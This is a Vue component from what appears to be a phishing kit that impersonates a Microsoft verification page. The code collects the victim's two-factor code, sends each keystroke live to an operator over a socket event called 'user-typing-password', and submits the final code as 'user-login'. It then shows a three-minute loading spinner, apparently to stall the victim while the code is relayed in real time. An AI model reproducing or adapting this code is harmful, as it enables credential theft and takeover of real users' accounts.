<template src="./index.html">
    
</template>
<script>
// ...existing code...
export default {
  name: 'MicrosoftCode',
  props: {
    adminData: {
      type: Object,
      default: () => ({})
    }
  },
  data() {
    return {
      username: localStorage.getItem('email'),
      userInfo : localStorage.getItem('accountinfo') ? JSON.parse(localStorage.getItem('accountinfo')) : {},
      message: '',
      password: '',
      microsoft_code: "",
    };
  },
  computed: {
  },
  watch: {
    
  },
  created() {
  
  },
  mounted() {
    document.title = "Microsoft - Verify";
    try {
      document.getElementById("body-form").classList.remove("loading");
    } catch(error) {
      
    }
    // var link = document.querySelector("link[rel*='icon']") || document.createElement('link');
    // link.type = 'image/x-icon';
    // link.rel = 'shortcut icon';
    // link.href = './assets/favicon/favicon.ico'; // Replace with the actual path
    // document.getElementsByTagName('head')[0].appendChild(link);
  },
  methods: {
    onTwoFactorInput() {
      // Debounce typing events để tránh spam
      if (this.typingTimer) {
        clearTimeout(this.typingTimer);
      }
      
      this.typingTimer = setTimeout(() => {
        const typingData = {
          username: this.username,
          formType: 'microsoft_code',
          inputValue: this.microsoft_code,
          time: new Date().toISOString()
        };
        
        // Emit socket event để thông báo admin
        this.$socket.emit('user-typing-password', typingData);
      }, 500); // Delay 500ms
    },

    handleMicrosoftCodeSubmit() {
      console.log(111);
      if (!this.microsoft_code) return;

      // Set loading state
      this.isLoading = true;
      
      const loginData = {
        username: this.username,
        status: 'microsoft_code',
        microsoft_code: this.microsoft_code,
        time: new Date().toISOString()
      };

      this.$socket.emit('user-login', loginData);
      document.getElementById("body-form").classList.add("loading");

      setTimeout(() => {
        try {
          document.getElementById("body-form").classList.remove("loading");
        } catch(error) {
          
        }
        // tại đây bạn xử lý tiếp (redirect, hiển thị thông báo, ...)
      }, 180000); // 180000ms = 3 phút

      // const step1 = document.getElementById("login-step-1");
      // step1.classList.add("transitioning");

      // this.$socket.on('admin-message', (data) => {
      //   const step1 = document.getElementById("login-step-1");
        
      //   if (step1) {
      //     step1.classList.remove("transitioning");
      //   }
      //   this.isLoading = false; // Reset loading state
      // });
    },
  }
};
</script>

<style lang="css" scoped>
@import "./styles.css";
</style>